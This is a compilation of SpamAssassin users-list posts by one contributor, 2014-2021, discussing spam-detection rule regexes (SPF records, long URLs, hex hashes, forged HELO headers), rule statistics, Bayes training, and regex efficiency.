URI_TRY_3LD FP on mynews.apple.com

2021-04-02 Thread Adam Katz
 Hey, John et al. It's been a while. I hope things are going well.

I've found an FP on URI_TRY_3LD from
https://mynews.apple.com/subscriptions?… that you could solve by adding
a new alternation to the relevant negative lookahead in that regex:

-uri URI_TRY_3LD
m,^https?://(?:try|start|get(?!\.adobe)|save|check(?!out)|act|compare|join|learn|request|visit(?!or)|my(?!sub|turbotax)\w)[^.]*\.[^/]+\.(?:com|net)\b,i
+uri URI_TRY_3LD
m,^https?://(?:try|start|get(?!\.adobe)|save|check(?!out)|act|compare|join|learn|request|visit(?!or)|my(?!news\.apple\.|sub|turbotax)\w)[^.]*\.[^/]+\.(?:com|net)\b,i
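The effect of the new alternation can be sanity-checked with a Python re translation of the two rule variants (an illustrative sketch; the real rule is a Perl regex in SpamAssassin's uri context, and the non-FP example URL below is hypothetical):

```python
import re

# Old rule, with Perl escapes carried over to Python re
old = re.compile(
    r'^https?://(?:try|start|get(?!\.adobe)|save|check(?!out)|act|compare'
    r'|join|learn|request|visit(?!or)|my(?!sub|turbotax)\w)'
    r'[^.]*\.[^/]+\.(?:com|net)\b', re.I)
# New rule: same pattern with the news.apple. alternation added
new = re.compile(
    old.pattern.replace(r'my(?!sub|turbotax)',
                        r'my(?!news\.apple\.|sub|turbotax)'), re.I)

fp = "https://mynews.apple.com/subscriptions?id=example"
assert old.search(fp)          # the reported false positive
assert not new.search(fp)      # suppressed by the new alternation
hit = "https://trynow.example.com/offer"
assert old.search(hit) and new.search(hit)  # spammy shape still matches
```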

 However, its hit freqs [1] show an S/O hovering around 0.100, and with
the GA consistently scoring it so close to your specified 2.000 limit, I
doubt this tweak will help enough.  I suggest further FP mitigations and
perhaps a lower score limit.

-Adam 

Links:
--
[1]
https://ruleqa.spamassassin.org/20210401-r1888263-n/URI_TRY_3LD/detail


Re: Hints needed for spf rule

2018-10-03 Thread Adam Katz
(Please ignore my last message. My phone hit “send” randomly.)

On Sep 28, 2018, at 9:48 AM EDT, bOnK wrote:
> A better idea might be testing if SPF for an external domain would pass on 
> your own server.
> This is what milter greylist does.
> http://hcpnet.free.fr/milter-greylist/

That’s interesting! We’d definitely need to ensure external relays for such a 
rule in SA, though of course this’d also require some plugin dev work. Does 
anybody have stats on that?

> Though probably exceptional, according to the RFC +all *can be* restrictive...
> https://tools.ietf.org/html/rfc7208#appendix-A.4
> 
>> A.4.  Multiple Requirements Example
>> 
>>Say that your sender policy requires both that the IP address is
>>within a certain range and that the reverse DNS for the IP matches.
>>This can be done several ways, including the following:
>> 
>>example.com.   SPF  ( "v=spf1 "
>>  "-include:ip4._spf.%{d} "
>>  "-include:ptr._spf.%{d} "
>>  "+all" )
>>ip4._spf.example.com.  SPF  "v=spf1 -ip4:192.0.2.0/24 +all"
>>ptr._spf.example.com.  SPF  "v=spf1 -ptr +all"
>> 
>>This example shows how the "-include" mechanism can be useful, how an
>>SPF record that ends in "+all" can be very restrictive, and the use
>>of De Morgan's Law.

This is amazing. And disgusting.

And it's the only remotely legitimate usage of either the ptr mechanism or 
(separately) of inanity like invoking De Morgan's Law, and therefore also of +all.

The ptr mechanism in SPF is officially "do not use" right in the spec; 
PTR records aren't vetted (any network operator can assign literally any 
rDNS to their IPs), so it trivializes forgery that would elicit an SPF pass.

Using De Morgan to intersect ptr with an un-forgeable requirement alleviates 
the issues of ptr but it’s much less complicated to merely bless each one in 
the SPF record.

Any (non-spammer) senders large enough to have issues fitting individual IPs in 
the max size of a record should definitely not delegate control of SPF to rDNS. 
They should instead better allocate their IP space for proper control by CIDR 
or else give up and use an Email Service Provider that actually knows what it's 
doing.

Re: Hints needed for spf rule

2018-10-03 Thread Adam Katz
On Sep 28, 2018, at 9:48 AM, bOnK wrote:
> A better idea might be testing if SPF for an external domain would pass on 
> your own server.
> 
> This is what milter greylist does.
> http://hcpnet.free.fr/milter-greylist/
> 
> Though probably exceptional, according to the RFC +all *can be* restrictive...
> https://tools.ietf.org/html/rfc7208
> 
> A.4.  Multiple Requirements Example
> 
>Say that your sender policy requires both that the IP address is
>within a certain range and that the reverse DNS for the IP matches.
>This can be done several ways, including the following:
> 
>example.com.   SPF  ( "v=spf1 "
>  "-include:ip4._spf.%{d} "
>  "-include:ptr._spf.%{d} "
>  "+all" )
>ip4._spf.example.com.  SPF  "v=spf1 -ip4:192.0.2.0/24 +all"
>ptr._spf.example.com.  SPF  "v=spf1 -ptr +all"
> 
>This example shows how the "-include" mechanism can be useful, how an
>SPF record that ends in "+all" can be very restrictive, and the use
>of De Morgan's Law.
> 
> -- 
> b.



Re: Hints needed for spf rule

2018-09-24 Thread Adam Katz
 

On 2018-09-22 10:33 am, Kevin A. McGrail wrote: 

> On 9/22/2018 10:29 AM, Matus UHLAR - fantomas wrote:
> 
>> remove those ?'s: /^v=spf1 .*?all/ and /^v=spf1 .*+all/
> 
> Updated. I was trying to stop a greedy regex if someone was doing a
> weird spf but I am overthinking.

These SPF records are all effectively equivalent (the fourth is Sender
ID [1], we'll get to #5 later): 

v=spf1 +all
v=spf1 all
v=spf1 all 192.0.2.0/24
v=spf2.0/mfrom +all
v=spf1 1.2.3.0/1 128.4.5.0/2 192.6.7.8/3 -all

I therefore propose regexps like /^v=spf[12].*[\s+]all\b/ and
/^v=spf[12].*\s\?all\b/ (the latter should be very rare and a better
indication of a clueless admin than a spammer).

The fifth item above permits 0.0.0.0 to 223.255.255.255, so only
multicast and the reserved Class E network are banned. To address
this, consider /^v=spf[12].*[0-9]\/[0-7]\b/. I haven't observed this sort
of workaround (yet), but it's the attackers' logical escalation in
response to this. (I conservatively chose a max mask of /7, though I
don't think there's any legitimate use of /8, even by the remaining
Class A holders [2] like AT&T, HP, and the US DoD--nobody _should_ have
an email network even approaching a /16 let alone a /8, though note that
Google currently includes three /16s. I'm not sure where to draw a
similar "too large" threshold for IPv6; perhaps /32?)
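The two proposed rules can be exercised against the five example records with a Python re sketch (the Perl escapes carry over directly here; this is illustration, not the shipped rule syntax):

```python
import re

permissive = re.compile(r'^v=spf[12].*[\s+]all\b')     # bare "all" or "+all"
neutral    = re.compile(r'^v=spf[12].*\s\?all\b')      # "?all": clueless admin
wide_cidr  = re.compile(r'^v=spf[12].*[0-9]/[0-7]\b')  # absurdly wide mask

records = [
    "v=spf1 +all",
    "v=spf1 all",
    "v=spf1 all 192.0.2.0/24",
    "v=spf2.0/mfrom +all",
    "v=spf1 1.2.3.0/1 128.4.5.0/2 192.6.7.8/3 -all",
]
assert all(permissive.search(r) for r in records[:4])
assert not permissive.search(records[4])  # "-all" evades the first rule...
assert wide_cidr.search(records[4])       # ...but the CIDR rule catches it
assert neutral.search("v=spf1 ?all")
```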

-Adam (still here, sometimes) 

Links:
--
[1] https://en.wikipedia.org/wiki/Sender_ID
[2]
https://en.wikipedia.org/wiki/List_of_assigned_/8_IPv4_address_blocks#List_of_assigned_/8_blocks

Re: About Petya2 campaign

2017-06-28 Thread Adam Katz
My team has seen no evidence that Petya/NotPetya/Nyetya has an email
vector.  Everything we've found on this front has been a different
attack.  The true source of this attack is currently believed to be from
fraudulent and unsigned tax software updates:

From
http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html
> The identification of the initial vector has proven more challenging.
> Early reports of an email vector can not be confirmed. Based on
> observed in-the-wild behaviors, the lack of a known, viable external
> spreading mechanism and other research we believe it is possible that
> some infections may be associated with software update systems for a
> Ukrainian tax accounting package called MeDoc. Talos continues to
> research the initial vector of this malware.

This happened with WannaCry too.  The emails we saw reported as WannaCry
ended up being Jaff
<http://blog.talosintelligence.com/2017/05/wannacry.html?showComment=1494683710652#c7954588230675341778>.

If you have email samples suggesting otherwise, I'd very much like to
see them.

Adam Katz
@adamhotep <https://twitter.com/adamhotep>


On 06/27/2017 11:09 AM, Alex wrote:
> Hi,
> On Tue, Jun 27, 2017 at 1:51 PM, Pedro David Marco
> <pedrod_ma...@yahoo.com> wrote:
>> Hi everybody...
>> just bothering you to share this:
>> We are detecting  Petya2 inside attached PDFs...  (not detected by many AV)
>> has anyone seen it into any MS OFFICE attachment?  or maybe any .js dropper?
> How are you detecting them? Tips for blocking, if the AVs aren't
> catching them yet? Have you submitted to sanesecurity?




signature.asc
Description: OpenPGP digital signature


Re: Add "may be forged" minor rule?

2015-09-30 Thread Adam Katz
On 09/28/2015 02:55 PM, RW wrote:
> On Mon, 28 Sep 2015 14:27:33 -0700 (PDT) John Hardin wrote:
>>> # Add spamminess to "may be forged" warning in Received header
>>> header RCVD_MAY_BE_FORGED   Received =~ /\(may be forged\)/
>>> describe RCVD_MAY_BE_FORGED Fake HELO info in Received header
>>> score RCVD_MAY_BE_FORGED0.2
>> RE looks fine. I'd just describe it as "forgery warning in Received 
>> header" rather than trying to interpret *why* the warning is there.

This has existed (in sandbox form, with stats) for quite a while:

header __MAY_BE_FORGED  Received =~ /\(may be forged\)/
meta MAY_BE_FORGED  __MAY_BE_FORGED && !__NOT_SPOOFED && !__VIA_ML
describe MAY_BE_FORGED  Relay IP's reverse DNS does not resolve to IP

   MSECS  SPAM%   HAM%    S/O    RANK  SCORE  NAME
   0      1.3921  0.1703  0.891  0.65  0.01   T_MAY_BE_FORGED
   0      1.4303  0.2045  0.875  0.64  (n/a)  __MAY_BE_FORGED


So this isn't the strongest of spam indicators, at least in the general
case.

> YMMV but I find that in deep received headers "may be forged" is a
> slight ham indicator. That's why I suggested limiting the match to the
> MX server's received header. 

It's a spam indicator on *some* /properly implemented/ mail
infrastructures.  You need to test it on your own infrastructure to
ensure that sendmail and rDNS are playing nice together.  If your
infrastructure /doesn't/ add this header (this is a sendmail thing
iirc), you do not want this type of rule.  Even if it does, you have the
issue of external mail servers adding this header.  That's why the above
meta rule excludes mailing lists.

-Adam

-- 
Adam Katz
@adamhotep <https://twitter.com/adamhotep>




SARE RULEGEN, Re: Rule updates....

2015-01-08 Thread Adam Katz
Ran these against my corpus.  Here are the worst performers (lots in
common with RW's complaints):

SPAM%   HAM%    S/O    NAME
0.013  0.153  0.080  __RULEGEN_PHISH_BLR6YY
0.006  0.286  0.022  __RULEGEN_PHISH_0ATBRI
0.008  0.334  0.023  __RULEGEN_PHISH_L3I0Z5
0.002  0.300  0.006  __RULEGEN_PHISH_LGYG7Q
0.017  1.387  0.012  __RULEGEN_PHISH_QVS6GE
0.045  2.490  0.018  __RULEGEN_PHISH_UNQ4VP
0.027  2.011  0.013  __RULEGEN_PHISH_B9HL3A

body __RULEGEN_PHISH_UNQ4VP  / may contain information that is /
body __RULEGEN_PHISH_QVS6GE  / or entity to which it is addressed/
body __RULEGEN_PHISH_B9HL3A  /The information contained in this /
body __RULEGEN_PHISH_0ATBRI  / it is addressed\. If you are n/
body __RULEGEN_PHISH_LGYG7Q  / you have received it in error. /
body __RULEGEN_PHISH_BLR6YY  /uthorised and regulated by the /
body __RULEGEN_PHISH_L3I0Z5  / is intended solely for the ..d/

A large number of the FPs come from Paypal and similar services.

Even controlling for those, I haven't found the phishing ruleset useful
at all.  The fraud rules do have limited utility.

What relationship does this have to the 10+ year-old SARE stuff?


On 12/20/2014 03:35 AM, Axb wrote:
 On 12/18/2014 06:27 PM, RW wrote:
 On Tue, 16 Dec 2014 13:10:05 +0100
 Axb wrote:

 https://sourceforge.net/projects/sare/files/

 replaces any older version.

 leech while it lasts

 adjust scores if needed..


 There are some rules that shouldn't be there. (I only tested a few that
 looked the most dubious)

 The first is a common phrase in mail from UK banks and other financial
 services companies. Note the ise spelling which is common outside
 the US.

 body __RULEGEN_PHISH_BLR6YY  /uthorised and regulated by the /


 The following are common in legal disclaimer signatures:

 body __RULEGEN_PHISH_UNQ4VP  / may contain information that is /
 body __RULEGEN_PHISH_B9HL3A  /The information contained in this /
 body __RULEGEN_PHISH_C6URDE  / do not necessarily represent those of /
 body __RULEGEN_PHISH_L3I0Z5  / is intended solely for the ..d/


 This hits some of of my ham:

 body __RULEGEN_PHISH_SRX3XZ  / apologize for any inconvenience/


 Unless there's a bug, the fact that those disclaimer phrases got through
 suggests that these rules are either intended to be very much more
 aggressive than the SOUGHT rules,  or the ham corpus isn't good enough.


 as the rules were generated with donated corpus data, you're more than
 welcome to send me an archive of ham samples to avoid these potential
 issues.










Re: Emails with extremely long URLs

2014-11-23 Thread Adam Katz
On 11/22/2014 07:16 PM PST, John Hardin wrote:
 On Sat, 22 Nov 2014, Igor Chudov wrote:
 I receive spam emails that contain extremely long URLs, about 2,400
 characters. I wanted to know if spamassassin has a rule that I can
 turn on to flag such URLs. I do not think that I ever receive
 legitimate emails with URLs that long.

 I don't think there's anything in the base rules but that should be
 pretty simple:

uri   URI_ABSURDLY_LONG  /.{2000}/

There was a similar request on Stack Overflow
https://stackoverflow.com/questions/26478828/spamassassin-regex-to-catch-long-url
recently.  It had the extra requirement of satisfying TLDs that SA uri
rules cannot yet extract from bodies, but the stats I gave are actually
based on uri rules.

An excerpt from my answer on 2014/11/13:
 That will technically work, though I'm sure you'll find it fires on a
 LOT of non-spam, marketing mail in particular [...]

 No size range is going to have a terribly good spam:ham ratio (an S/O
 https://wiki.apache.org/spamassassin/HitFrequencies#The_S.2FO_Ratio,
 aka precision https://en.wikipedia.org/wiki/Precision_and_recall, of
 0.900 is possibly acceptable, but you really want to be closer to
 1.000). By my tests, the best range is 192-256 characters, but even
 that is too weak (S/O of 0.862 in my data) to be terribly useful.
 There is almost no spam using a link with over 1024 characters (S/O of
 0.057 for me).

That S/O is still true (its S/O is now 0.054 and its spam hit rate
remains below 0.01%).  At 2000+ chars, the S/O is still quite low, as
are the independent volumes of spam and ham.  Volume of all mail
containing 1024+ character URLs has increased slightly in the past few
months, from roughly 0.10% to 0.15%.  This increase has been slightly
more among ham than spam.
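John's one-liner checks length against an already-extracted URI string; a minimal Python rendering (the URLs are made-up examples):

```python
import re

# Equivalent of "uri URI_ABSURDLY_LONG /.{2000}/" applied to a URI string
absurdly_long = re.compile(r'.{2000}', re.S)

assert absurdly_long.search("https://example.com/?q=" + "x" * 2400)
assert not absurdly_long.search("https://example.com/short")
```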





Re: Philosophical question on Bayes (was Re: 23_bayes_ignore_header.cf)

2014-10-14 Thread Adam Katz
 On Tue, 14 Oct 2014 16:10:52 +0200 Axb axb.li...@gmail.com wrote:
 and to avoid further discussions of what header may pollute bayes or
 not, I've removed all header entries which are not directly related
 to AV/filter products.

On 10/14/2014 07:17 AM, David F. Skoll wrote:
 I'm not sure I agree with being too clever about Bayes.  Surely by its
 very nature, the Bayes algorithm will itself indicate which tokens
 are relevant and which are not?  Isn't that the whole point of Bayes?

 I think being too clever about massaging the data that gets fed to
 Bayes may be counter-productive.  For sure, *some* massaging is in order;
 a token should be a semantic unit, so something like www.example.com
 should probably be one token rather than three, but beyond that I wonder
 if it's good or not to massage the data?

The purpose of bayes_ignore_header is twofold:

 1. Prevent inheriting other systems' false positives (ensure better
independence)
 2. Prevent relying upon headers that won't exist at delivery time (e.g.
added by the mailbox server)

This is why it's so important to ignore other spam engines, which
basically fit into both of those categories.






Re: Help with body rule

2014-05-28 Thread Adam Katz
On 05/28/2014 11:16 AM, Alex wrote (syntax highlighting added):
 I'm trying to write a body rule that will catch an email exactly
 containing any number of characters up to 15, followed by a URI,
 followed by any number of characters, up to 15. My attempt has failed
 miserably, and hoped someone could help.
 body  LOC_SHORT_BODY_URI  m{^.{0,15}(https?://.{1,50}).{0,15}$}

 This catches pretty much everything and I can't figure out why.

This should catch pretty much any mail with a web link in it.  Body
rules don't reliably match start- and end-of-line markers (^ and $), so
you can't rely on them.  You also have no delimiter between the URL
and the following text.  For example:

body  LOC_SHORT_BODY_URI  m{\A.{0,15}(?:https?://\S{1,50})(?!\S).{0,15}\Z}ms


This also improves your efficiency by using a non-capturing group and
(far more importantly) removing the ambiguity between your two ranges
(so there's no need to try every conceivable iteration).  I used a
negative look-ahead in order to satisfy a lack of trailing text (rather
than using \s).  I also used \A and \Z with /ms in order to better
describe a short email, but again *this may not work reliably due to how
the body is parsed*.  This would work slightly better with rawbody, but
it still won't be perfect.
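As a sanity check, here's the suggested pattern in Python re (a sketch only: re.S mirrors Perl's /s so "." can cross newlines, and \A/\Z anchor the whole pseudo-body string; the sample bodies are made up):

```python
import re

short_body_uri = re.compile(
    r'\A.{0,15}(?:https?://\S{1,50})(?!\S).{0,15}\Z', re.S)

# A short body with one link, at most 15 chars on either side: matches
assert short_body_uri.match("Check this out https://example.com/x thanks")
# Too much text before the link: no match
assert not short_body_uri.match(("word " * 20) + "https://example.com")
```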




Re: khop channel errors

2014-02-17 Thread Adam Katz
On 02/01/2014 09:04 PM, Glenn Sieb wrote:
 Actually, now that I look at it, it appears to be a DNS issue. Hopefully
 it will get fixed soon.
 I noticed this a while ago, my guess is that the channel's gone.

 Are there any other channels out there at this point? What are people
 using nowadays?

I intend to return those channels eventually.  My server has been down
for several months.  I'm hoping to be back online in the spring.




Re: Spam Pattern

2014-02-14 Thread Adam Katz
On 02/12/2014 01:46 PM, John Hardin wrote:
 On Wed, 12 Feb 2014, Axb wrote:
 On 02/12/2014 10:06 PM, John Hardin wrote:
  Perhaps something like this:

 body      __HEXHASHWORD   /\b[0-9a-f]{30,}\s[a-z]{1,10}\b/
 tflags    __HEXHASHWORD   multiple maxhits=5
 meta      HEXHASH_WORD    __HEXHASHWORD > 4
 describe  HEXHASH_WORD    Hexadecimal hash followed by a word

  Added to my sandbox, just in case.

 John,

 Isn't {30,} (without a limit) dangerously expensive?

 Potentially expensive; the character class and the fact that the
 following atom is not in that class limits the risk - backtracking
 isn't a possibility. However, point taken - recommend {30,64} instead.

Given the nature of the content, I'd go the other direction and not
require the word boundary.  This removes the wildcard, though it doesn't
short circuit as quickly, so one could debate which version is more
efficient.

body      __HEXHASHWORD   /\b[a-z]{1,10}\s[0-9a-f]{30}/
tflags    __HEXHASHWORD   multiple maxhits=5
meta      HEXHASH_WORD    __HEXHASHWORD > 4
describe  HEXHASH_WORD    Five hexadecimal hashes, each following a word

I'm curious if the hex string is always so similar; it may be enough to
use /\bb8b177bf24975/ and not need the tflags multiple piece.
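The reversed subrule can be tried out in Python re (a sketch; the sample text and hashes below are made up, and SA's tflags multiple would count each hit the way findall does here):

```python
import re

# A short lowercase word, whitespace, then at least 30 hex digits
hex_after_word = re.compile(r'\b[a-z]{1,10}\s[0-9a-f]{30}')

sample = ("file b8b177bf24975cea8fbf8ba9ad94b24ff51a72bc\n"
          "data 0123456789abcdef0123456789abcdef01234567\n")
assert len(hex_after_word.findall(sample)) == 2
```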





Re: Spam Pattern

2014-02-14 Thread Adam Katz
Ha!  I checked my mail before sending this; we're on the same wavelength
yet our emails are out of sync.  You just suggested the same thing I was
leaning toward.

On 02/14/2014 10:53 AM, John Hardin wrote:
 S/O is a little surprising:

 http://ruleqa.spamassassin.org/?daterev=20140213-r1567864-n&rule=%2FHEXHASH


 I'm curious as to what hits that in ham...

 Perhaps more repetitions would improve that?

I'm actually thinking of replacing the leading \b with a \s to avoid
matching paths and extensions and maybe requiring two preceding words to
avoid a list of file/md5 pairings.  We can experiment with different hit
thresholds as well.

body      __HEXHASHWORD   /(?:\s[a-z]{1,10}){2}\s[0-9a-f]{30}/
tflags    __HEXHASHWORD   multiple maxhits=8
meta      HEXHASH_WORD_5  __HEXHASHWORD >= 5
describe  HEXHASH_WORD_5  5 hexadecimal hashes, each following two words
meta      HEXHASH_WORD_6  __HEXHASHWORD >= 6
describe  HEXHASH_WORD_6  6 hexadecimal hashes, each following two words
meta      HEXHASH_WORD_7  __HEXHASHWORD >= 7
describe  HEXHASH_WORD_7  7 hexadecimal hashes, each following two words
meta      HEXHASH_WORD_8  __HEXHASHWORD >= 8
describe  HEXHASH_WORD_8  8 hexadecimal hashes, each following two words


Users:  Do /not/ implement all of these at once.  This is for Rule QA
testing only.  Once we have results, we can figure out which threshold
is best and then come up with a suggestion or published rule.  (Maybe
tflags nopublish is wise here.)




Re: Spam Pattern

2014-02-14 Thread Adam Katz
On 02/14/2014 11:23 AM, Amir Caspi wrote:
 To be clear, that wasn't my sample; I am not the originator of this
 thread.

Whoops, my bad.  My point was clear anyway.

 What about this, a variant of what I posted earlier?  It requires 10
 matches, but I believe it does the same thing as yours except it does
 not limit the word size between hashes, and allows for whitespace:

 rawbody AC_REPEATED_HASHCODE  /(\s[a-f0-9]{25,}\s)(?:(?:\s*\w+)+\1){10}/

 Yours also limits the amount of characters between repeated hashes to
 99, but this might well not be the case.

Noo, don't do that.  (?:\s*\w+)+ is a *ReDoS bomb*
(https://en.wikipedia.org/wiki/ReDoS) (and you have it ten
times!) which will destroy your efficiency.  Think about how it would
match the string "aaaaaa" (or ANY word, for that matter).  Here are its
trials, matching each of the nested parentheses to illustrate the logic:

 1. (aaaaaa)
 2. (aaaaa)(a)
 3. (aaaa)(aa)
 4. (aaaa)(a)(a)
 5. (aaa)(aaa)
 6. (aaa)(aa)(a)
 7. (aaa)(a)(aa)
 8. (aaa)(a)(a)(a)
 9. (aa)(aaaa)
10. (aa)(aaa)(a)
11. (aa)(aa)(aa)
12. (aa)(aa)(a)(a)
13. (aa)(a)(aaa)
14. (aa)(a)(aa)(a)
15. (aa)(a)(a)(aa)
16. (aa)(a)(a)(a)(a)
17. (a)(aaaaa)
18. (a)(aaaa)(a)
19. (a)(aaa)(aa)
20. (a)(aaa)(a)(a)
21. (a)(aa)(aaa)
22. (a)(aa)(aa)(a)
23. (a)(aa)(a)(aa)
24. (a)(aa)(a)(a)(a)
25. (a)(a)(aaaa)
26. (a)(a)(aaa)(a)
27. (a)(a)(aa)(aa)
28. (a)(a)(aa)(a)(a)
29. (a)(a)(a)(aaa)
30. (a)(a)(a)(aa)(a)
31. (a)(a)(a)(a)(aa)
32. (a)(a)(a)(a)(a)(a)
33. (no match)

You want to fail faster than that!

I call these "ReDoS bombs" though Wikipedia uses the term "evil".  Given
how they're rarely intended, I don't like that term.  An actual evil
ReDoS, snuck in and uncaught, would be exploited in a "ReDoS attack". 
(A ReDoS attack could also exploit an unintended bomb.)
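The blowup is easy to quantify: the number of ways (?:\s*\w+)+ can split an n-letter word into nonempty chunks is the number of compositions of n, which is 2^(n-1). A pure-math sketch:

```python
# Compositions of n: every ordered way to split an n-letter word into
# one or more nonempty chunks, which is what the engine can try before
# conceding failure. There are 2**(n-1) of them.
def compositions(n: int) -> int:
    return 2 ** (n - 1)

print(compositions(6))    # 32 ways to split "aaaaaa"
print(compositions(30))   # 536870912: a 30-letter word allows >500M trials
```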




Re: AXB_X_ORIG_OMNIMS is causing too many FPs

2013-10-29 Thread Adam Katz
On 10/28/2013 12:30 PM, John Hardin wrote:
 On Mon, 28 Oct 2013, Axb wrote:
 I'll disable this rule.

 Convert it to a subrule, it may be useful in metas.

It is useful.  I added the domain to freemail_domains (see r1533678,
https://svn.apache.org/viewvc?view=revision&revision=1533678) to catch
an old spam signature
(http://ruleqa.spamassassin.org/?rule=FREEMAIL_REPLYTO) that the ISC
noted it is exhibiting
(https://isc.sans.edu/diary/New+spamming+technique+-+onmicrosoft.com/16841).
I don't think our list had been updated for a while, either; I found one
site (http://www.zemskov.net/free-email-domains.html) that lists
hundreds of domains we were missing.  Either it was especially
comprehensive or we're missing lots more.

This should do it:

header __ONMICROSOFT_REPLYTO  Reply-To =~ /\@\w{5,30}\.onmicrosoft\.com\b/i
meta KHOP_ONMS_REPLYTO_FREEMAIL  AXB_X_ORIG_OMNIMS && !__ONMICROSOFT_REPLYTO && __freemail_replyto
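The header subrule's regex can be checked in Python re (a sketch; the addresses below are hypothetical):

```python
import re

# Reply-To pointing at a Microsoft-hosted tenant domain
onms_replyto = re.compile(r'\@\w{5,30}\.onmicrosoft\.com\b', re.I)

assert onms_replyto.search("Reply-To: user@contoso.onmicrosoft.com")
assert not onms_replyto.search("Reply-To: user@gmail.com")
# tenant label shorter than 5 chars falls outside \w{5,30}
assert not onms_replyto.search("Reply-To: user@abcd.onmicrosoft.com")
```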





Re: FSL_HELO_BARE_IP_2 RCVD_NUMERIC_HELO

2013-10-14 Thread Adam Katz
On 10/12/2013 09:26 AM, Stan Hoeppner wrote:
 These two rules are adding 4.0 pts [...]
 Content analysis details:   (4.8 points, 4.2 required)
  pts rule name  description
  -
  2.8 FSL_HELO_BARE_IP_2 FSL_HELO_BARE_IP_2
  1.2 RCVD_NUMERIC_HELO  Received: contains an IP address used for HELO
  0.8 BAYES_50   BODY: Bayes spam probability is 40 to 60%
 [score: 0.5314]

The others have addressed the two rules you mentioned, so I'll leave
that alone in this email.

There's more here than that:  If you're using Bayes, you have to train
it.  Right now, it's hurting you:  Those 0.8 points should be some
negative value, perhaps -1.9 or -0.5 (the default scores for BAYES_00
and BAYES_05), which would then have made that message score 2.1 or 3.5,
both of which are below your 4.2 threshold (which is already too low!).

On that threshold:  there are better ways to nail more spam than
lowering the threshold.  SpamAssassin is highly tuned for 5.0 and while
it's safe to bump that threshold up (more conservative, e.g. I block at
8.0 and flag at 5.0), it is not as safe to pull it down.

Better way #1: plugins.  Razor2, Pyzor, DCC.  Decently drop-in (though
DCC isn't as easy as it once was).

Better way #2: Bayes.  Set it up to facilitate better training.  Create
learn-spam and learn-nonspam folders for each user and run cron jobs
that run sa-learn (or better, spamassassin -r so you can learn and
report them) and then empty the folders.  Once you can trust Bayes, you
can increase the magnitude of its scores.  Do this slowly and carefully.

Better way #3: AWL.  This is now disabled by default, in part due to
misunderstandings (it is horribly named; it's as much a black list as it
is a white list, and it's not as persistent as its storage model
purports).  This nudges a sender's mail towards its previous average
score.  Set it up site-wide, /not/ per-user, and start it with a low
factor (say 0.1) until you can trust it, slowly increasing it up to 0.5
(you can go higher, but I wouldn't go too much higher; I use 0.333). 
Keep in mind that AWL doesn't clean up after itself the way Bayes does,
so the DB will grow over time.  There are limited guides online for how
to prune it.

 Received: from bendel.debian.org (bendel.debian.org [82.195.75.100])
   by greer.hardwarefreak.com (Postfix) with ESMTP id C95BD6C0CE
   for s...@hardwarefreak.com; Sat, 12 Oct 2013 10:23:37 -0500 (CDT)
 [...]
 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on bendel.debian.org
 X-Spam-Level:
 X-Spam-Status: No, score=-9.6 required=4.0 tests=FOURLA,FREEMAIL_FROM,
   LDOSUBSCRIBER,LDO_WHITELIST,RCVD_NUMERIC_HELO,T_RP_MATCHES_RCVD,
   T_TO_NO_BRKTS_FREEMAIL autolearn=unavailable version=3.3.2
 [...]
 X-Amavis-Spam-Status: No, score=-5.735 tagged_above=-1 required=5.3
   tests=[BAYES_00=-2, FOURLA=0.1, FREEMAIL_FROM=0.001, LDO_WHITELIST=-5,
   RCVD_IN_DNSWL_NONE=-0.0001, RCVD_NUMERIC_HELO=1.164,
   T_RP_MATCHES_RCVD=-0.01, T_TO_NO_BRKTS_FREEMAIL=0.01] autolearn=ham

Another option is to trust Debian's SA instance.  You can add
82.195.75.100 to trusted_networks in your local.cf.  Be careful, this
would mean inheriting some of Debian's false negatives.




Re: FSL_HELO_BARE_IP_2 RCVD_NUMERIC_HELO

2013-10-14 Thread Adam Katz
On Sat, 12 Oct 2013, Stan Hoeppner wrote:
 and engage in discussion WRT lowering the score, eliminating the
 overlap with the other bare IP HELO rules, etc?

On 10/12/2013 07:28 PM, John Hardin wrote:
 It seems that 94% of the ham hits in masscheck are against list mail,
 and none of the spam hits are, so it would seem reasonable to add an
 exclusion for list messages.

 Maddoc hasn't touched these rules since 2009, so I will go ahead and
 add an exclusion for that.

Actually, the overlap issue is quite real.  These two rules
(http://ruleqa.spamassassin.org/?daterev=20131014-r1531815-n&rule=FSL_HELO_BARE_IP_2+RCVD_NUMERIC_HELO&srcpath=&g=Change)
are quite similar:

MSECS  SPAM%    HAM%    S/O    RANK  SCORE  NAME
0      60.7267  0.3533  0.994  0.85  2.00   FSL_HELO_BARE_IP_2
0      56.8567  0.0784  0.999  0.97  0.00   RCVD_NUMERIC_HELO

overlap spam: 99% of RCVD_NUMERIC_HELO hits also hit FSL_HELO_BARE_IP_2;
93% of FSL_HELO_BARE_IP_2 hits also hit RCVD_NUMERIC_HELO (ham 100%)
overlap spam: 93% of FSL_HELO_BARE_IP_2 hits also hit RCVD_NUMERIC_HELO;
99% of RCVD_NUMERIC_HELO hits also hit FSL_HELO_BARE_IP_2 (ham 22%)

That's a lot of overlap.  FSL_HELO_BARE_IP_2 may be well served by
excluding RCVD_NUMERIC_HELO.  Given its higher S/O, that might even get
the latter rule a score again (I assume the zero score came from John's
exclusion and a preference towards FSL_HELO_BARE_IP_2).





Re: Question about T_KHOP_FOREIGN_CLICK

2013-06-05 Thread Adam Katz
On 05/31/2013 06:51 AM, Bowie Bailey wrote:

 On 5/31/2013 8:30 AM, Matteo Vannucchi - TeamEnterprise wrote:
 Hello, my name is Matteo.

 I do not manage a spamassassin installation, but I would like to ask
 this simple question, because I saw it is a rule which is used to
 evaluate spam score.
 I tried searching Google, the users forum, the Wiki and the Docs page
 in the site, but did not find any information. The simple question
 is: how does T_KHOP_FOREIGN_CLICK rule work?

 Hope the answer is as simple.

 It's a fairly complex regex rule.  Without spending too much time
 analyzing it, I think it is looking for a link that says click here
 in a language other than english.

You are correct, though it also matches English.  I've placed a
syntactical explanation of this regex at http://regex101.com/r/qS8nF4

 A related question is why is this rule name duplicated?  My guess is
 that it was changed at some point from a rawbody rule to a uri_detail
 rule and the old one was left in there.  One of them should be removed
 to avoid confusion.

 from 72_active.cf:

 rawbody    T_KHOP_FOREIGN_CLICK
 m{\bhref=[^>]{9,199}>[^<]{0,80}(?:<(?!/a\b)[^>]{0,299}>[^<]{0,80}){0,9}[^<]{0,80}\b(?:cli(?:quez\W|ck\Wa)ici\b|cli(?:cca\W|c\Wa|que\Wa)qu[^.,a ]|klie?k(?:\Whi?er|ni(?:j|nite)\Wtu[tk]aj)\b)}si

